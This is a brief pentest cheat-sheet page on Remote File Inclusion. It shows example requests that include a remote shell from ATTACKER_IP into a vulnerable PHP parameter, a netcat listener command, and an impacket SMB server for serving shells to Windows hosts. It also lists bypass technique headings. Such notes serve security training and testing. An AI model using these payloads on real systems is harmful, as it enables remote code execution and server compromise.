Remote File Inclusion (RFI)
Remote File Inclusion (RFI)
Allows an attacker to inject external URL in a vulnerable backend PHP/Python/etc. function.
Example:
http://site.com/index.php?file=http://ATTACKER_IP/shell.phpTIP: If you detect an LFI vulnerability on a windows host, try to check if you can send files over SMB to the server like:
nc -lvnp PORT (Setup listener)impacket-smbserver –smb2support sharepath /root/Desktop/Shells
http://site.com/index.php?file=\\ATTACKER_IP\\FILE.phpAlternate Method: Metasploit
Blacklist Bypass
Null Byte
Last updated